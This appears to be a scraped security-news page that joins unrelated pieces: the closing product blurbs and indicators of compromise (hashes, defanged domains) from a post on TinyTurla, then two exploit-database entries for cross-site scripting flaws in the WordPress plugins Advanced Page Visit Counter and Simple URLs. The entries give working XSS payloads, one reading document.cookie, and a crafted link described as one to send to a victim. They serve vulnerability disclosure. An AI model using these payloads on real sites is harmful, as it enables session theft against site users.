Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

TinyTurla Next Generation - Turla APT spies on Polish NGOs

Advanced Page Visit Counter version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-SiteScripting (XSS) (Authenticated)# Date: 11.10.2023# Exploit Author: Furkan ÖZER# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/# Version: 8.0.5# Tested on: Kali-Linux,Windows10,Windows 11# CVE: N/A# Description:Advanced Page Visit Counter is a remarkable Google Analytics alternativespecifically designed for WordPress websites, and it has quickly become amust-have plugin for website owners and administrators seeking powerfultracking and analytical capabilities. With the recent addition of EnhancedeCommerce Tracking for WooCommerce, this plugin has become even moreindispensable for online store owners.Homepage | Support | Premium VersionIf you’re in search of a GDPR-friendly website analytics plugin exclusivelydesigned for WordPress, look no further than Advanced Page Visit Counter.This exceptional plugin offers a compelling alternative to Google Analyticsand is definitely worth a try for those seeking enhanced data privacycompliance.This is a free plugin and doesn’t require you to create an account onanother site. All features outlined below are included in the free plugin.Description of the owner of the plugin Stored Cross-Site Scripting attackagainst the administrators or the other authenticated users.The plugin does not sanitise and escape some of its settings, which couldallow high privilege users such as admin to perform Stored Cross-SiteScripting attacks even when the unfiltered_html capability is disallowed(for example in multisite setup)The details of the discovery are given below.# Steps To Reproduce:1. Install and activate the Advanced Page Visit Counter plugin.2. Visit the "Settings" interface available in settings page of the pluginthat is named "Widget Settings"3. In the plugin's "Today's Count Label" setting field, enter the payloadPayload: " "type=image src=1 onerror=alert(document.cookie)> "6. Click the "Save Changes" button.7. The XSS will be triggered on the settings page when every visit of anauthenticated user.# Video Linkhttps://youtu.be/zcfciGZLriM

Advanced Page Visit Counter 1.0 Cross Site Scripting

WordPress Simple URLs plugin versions prior to 115 suffer from a cross site scripting vulnerability.

    # Exploit Title: simple urls < 115  XSS# Google Dork:# Exploit Author: AmirZargham# Vendor Homepage: https://getlasso.co/# Software Link: https://wordpress.org/plugins/simple-urls/# Version: < 115# Tested on: firefox,chrome# CVE: CVE-2023-0099# CWE: CWE-79# Platform: MULTIPLE# Type: WebAppsDescriptionThe Simple URLs WordPress plugin before 115 does not sanitise and escapesome parameters before outputting them back in some pages, leading toReflected Cross-Site Scripting.Usage Info:send malicious link to victim:https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=<script>alert(origin)</script>

Tag

#wordpress